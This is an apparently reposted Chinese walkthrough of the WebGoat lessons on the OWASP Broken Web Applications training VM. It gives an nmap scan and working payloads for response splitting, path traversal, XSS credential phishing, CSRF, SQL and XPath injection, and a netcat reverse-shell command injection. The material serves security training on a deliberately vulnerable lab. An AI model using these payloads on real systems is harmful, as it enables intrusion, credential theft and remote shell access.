owaspbwa之WebGoat

☆樱花仙子☆ 提交于 2019-11-30 08:17:15

简介

 下载:https://sourceforge.net/projects/owaspbwa/files/

GitHub: https://github.com/chuckfw/owaspbwa/wiki/UserGuide

0x001 侦查

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 5.3p1 Debian 3ubuntu4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 ea:83:1e:45:5a:a6:8c:43:1c:3c:e3:18:dd:fc:88:a5 (DSA)
|_  2048 3a:94:d8:3f:e0:a2:7a:b8:c3:94:d7:5e:00:55:0c:a7 (RSA)
80/tcp   open  http        Apache httpd 2.2.14 ((Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL...)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
|_http-title: owaspbwa OWASP Broken Web Applications
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp  open  imap        Courier Imapd (released 2008)
|_imap-capabilities: UIDPLUS THREAD=ORDEREDSUBJECT THREAD=REFERENCES completed IDLE QUOTA OK CAPABILITY ACL ACL2=UNIONA0001 CHILDREN IMAP4rev1 SORT NAMESPACE
443/tcp  open  ssl/https?
|_ssl-date: 2018-12-17T06:55:14+00:00; 0s from scanner time.
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
5001/tcp open  java-rmi    Java RMI
8080/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
|_http-title: Site doesn't have a title.
8081/tcp open  http        Jetty 6.1.25
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Jetty(6.1.25)
|_http-title: Choose Your Path
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port5001-TCP:V=7.70%I=7%D=12/17%Time=5C174849%P=x86_64-pc-linux-gnu%r(N
SF:ULL,4,"\xac\xed\0\x05");
MAC Address: F4:B7:E2:01:6D:06 (Hon Hai Precision Ind.)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.17 - 2.6.36
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: OWASPBWA, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

0x002 General

http服务器缓存利用 HTTP Splitting

#当对服务器发请求
HTTP/1.1 302 Moved Temporarily
Date: Mon, 17 Dec 2018 14:21:31 GMT
Server: Apache-Coyote/1.1
Location: http://192.168.1.104/WebGoat/attack?Screen=3&menu=100&fromRedirect=yes&language=en #重点在这
Content-Type: text/html;charset=ISO-8859-1
Via: 1.1 127.0.1.1
Vary: Accept-Encoding
Content-Length: 0
Connection: close

构造恶意代码

en%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0aInsert undesireable content here
en%0d%0aContent-length%3a+0%0d%0a%0d%0aHTTP%2f1.1+200+OK%0d%0aContent-Type%3a+text%2fhtml%3b%0d%0aLast-Modified%3a+Thu%2c+01+Jan+2099+12%3a00%3a00+GMT+%0d%0aContent-length%3a+19%0d%0a%0d%0a%26lt%3bhtml%26gt%3bhacked%26lt%3b%2fhtml%26gt%3b

0x003 Access Control Flaws

Bypass a Path Based Access Control Scheme

../../../../../../../etc/tomcat6/tomcat-users.xml

LAB: Role Based Access Control

employee_id=105&action=ViewProfile #登录后修改为 DeleteProfile

0x004

Stage 1: 绕过表示层访问控制(Bypass Presentational Layer Access Control)

Tom用户 小写密码登录  然后点击ViewProfile  抓包修改数据 让Tom用户拥有 DeleteProfile 权限


employee_id=105&action=ViewProfile修改为 DeleteProfile

Stage 2: 添加业务层的访问控制(Add Business Layer Access Control)

    要修改 org.owasp.webgoat.lessons.RoleBasedAccesControl.RoleBasedAccessContro l.java 类中的相关代码

    修改 handleRequest 方法

//***************CODE HERE************************* 
if(!isAuthorized(s, getUserId(s), requestedActionName))
{
 throw new UnauthorizedException();
}
//************************************************* 

Stage 3: 绕过数据层访问控制(Breaking Data Layer Access Control)

选择Tom小写密码tom登录   抓包修改为Jarry的ID 101


employee_id=105&action=ViewProfile  #id修改为101 

Stage 4: 添加数据层访问控制(Add Data Layer Access Control)

0x005  Ajax Security

基于 DOM 的跨站点访问(LAB: DOM‐Based cross‐site scripting)

STAGE 1:

<IMG SRC="images/logos/owasp.jpg"/>

STAGE 2:

<img src=x οnerrοr=;;alert('XSS') />

STAGE 3:

<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

STAGE 4:

Please enter your password:<BR><input type = "password" name="pass"/><button
onClick="javascript:alert('I have your password: ' +
pass.value);">Submit</button><BR><BR><BR><BR><BR><BR><BR><BR>
<BR><BR><BR><BR><BR><BR><BR><BR> 

DOM 注入(DOM Injection)

拦截数据 修改body内容

document.form.SUBMIT.disabled = false;

XML 注入(XML Injection)

<root>
<reward>WebGoat Core Duo Laptop 2000 Pts</reward>
<reward>WebGoat Hawaii Cruise 3000 Pts</reward> 
</root>

JSON 注入(JSON Injection)

burpsuite 设置 : Proxy-Options-Intercept Server Response设置response拦截的选项:

拦截 修改 JSON数据


{
"From": "Boston",
"To": "Seattle", 
"flights": [
{"stops": "0", "transit" : "N/A", "price": "$600"}, //任意修改
{"stops": "2", "transit" : "Newark,Chicago", "price": "$300"} //任意修改 
]
}

静默交易攻击(Silent Transactions Attacks)

查看源代码  两个关键的 JavaScript 函数 function processData()   function submitData

//在页面的URL输入:
javascript:submitData(16666000,100000)

 

危险指令使用(Dangerous Use of Eval)

123');alert(document.cookie);(' 

不安全的客户端存储(Insecure Client Storage)

选择要购买的商品 burp抓包修改金额为0 

0x006 认证缺陷(Authentication Flaws)

基本认证(Basic Authentication)


Authorization
guest:guest

多级登录 1(Multi Level Login 1)

STAGE 1

//用户名密码登录
用户名:Jane,密码:tarzan
TAN 15648

STAGE 2

用户名:Jane,密码:tarzan
TAN 15648

burp拦截 hidden_ten值修改为1
hidden_tan=1&tan=15648&Submit=Submit 

0x008 缓冲区溢出(Buffer Overflows)

Off‐by‐One 缓冲区溢出(Off‐by‐One Overflows)

//随便填写
test
test
123
//request 请求拦截后发往 intruder
249.99+-+24+hours&SUBMIT=Accept+Terms&last_name=test&first_name=test&room_no=§123§
//character blocks 参数设置
base string: 3
min length: 1024
max length: 1024000
step: 1024 

0x009 代码质量(Code Quality)

在 HTML 中找线索(Discover Clues in the HTML) 

查看源代码中的注释可找到用户名密码

<!-- FIXME admin:adminpw  --><!-- Use Admin to regenerate database  -->

0x010 并发(Concurrency)

线程安全问题(Thread Safety Problems)

//两个用户, 浏览器打开两个相同页面 同时提交 会看到另个用户的信息
jeff
dave

购物车并发缺陷(Shopping Cart Concurrency Flaw)

选择要购买的产品,打开两个页面同时提交 

0x011 跨站脚本攻击(Cross‐Site Scripting (XSS))

使用 XSS 钓鱼(Phishing with XSS) 可以使用Beef更加方便快捷

<script>function hack(){ alert("Had this been a real attack... Your credentials were just stolen. User Name
= " + document.forms[0].user.value + "Password = " + document.forms[0].pass.value); XSSImage=new
Image; XSSImage.src="http://localhost/WebGoat/catcher?PROPERTY=yes&user="+document.forms[0].user.value + "&password=" + document.forms[0].pass.value + "";}
</script><form><br><br><HR><H3>This feature requires account login:</H3 ><br><br>Enter
Username:<br><input type="text" id="user" name="user"><br>Enter Password:<br><input
type="password" name = "pass"><br><input type="submit" name="login" value="login"
οnclick="hack()"></form><br><br><HR>

跨站脚本攻击(LAB: Cross Site Scripting)

<script>alert(document.cookie);</script>

存储型 XSS 攻击(Stored XSS Attacks)

存储型XXS可以打站点后台,获得密码。如果结合beef威力更大

<script language="javascript" type="text/javascript">alert(document.cookie);</script>

跨站请求伪造(Cross Site Request Forgery (CSRF))

<img src="http://localhost/WebGoat/attack?Screen=81&menu=210&transferFunds=5000" width="1"
height="1" />

绕过 CSRF 确认( CSRF Prompt By‐Pass)

<img src="http://localhostattack?Screen=81&menu=210&transferFunds=5000"
οnerrοr="document.getElementById('image2').src='http://localhostattack?Screen=81&menu=210&transf
erFunds=CONFIRM'" width="1" height="1" />
<img id="image2" width="1" height="1" /> 

站跟踪攻击(Cross Site Tracing (XST) Attacks)

<script type="text/javascript">if ( navigator.appName.indexOf("Microsoft") !=-1) {var xmlHttp = new
ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open("TRACE", "./", false);
xmlHttp.send();str1=xmlHttp.responseText; while (str1.indexOf("\n") > -1) str1 = str1.replace("\n","<br>");
document.write(str1);}</script>

0x012 不当的错误处理(Improper Error Handling)

打开认证失败方案(Fail Open Authentication Scheme)

burp拦截 删除password这项 

0x013 注入缺陷(Injection Flaws)

命令注入(Command Injection)


" 127.0.0.1 && nc -vn  192.168.1.101 4444 -e /bin/bash

数字型 SQL 注入(Numeric SQL Injection)

or 1=1

日志欺骗(Log Spoofing)

Smith%0d%0aLogin Succeeded for username: admin

XPATH 型注入(XPATH Injection)
 

Smith' or 1=1 or 'a'='a

字符串型注入(String SQL Injection)

' or 1=1 --

SQL 注入(LAB: SQL Injection)

smith' or '1' = '1

 

​​​​​​​

易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!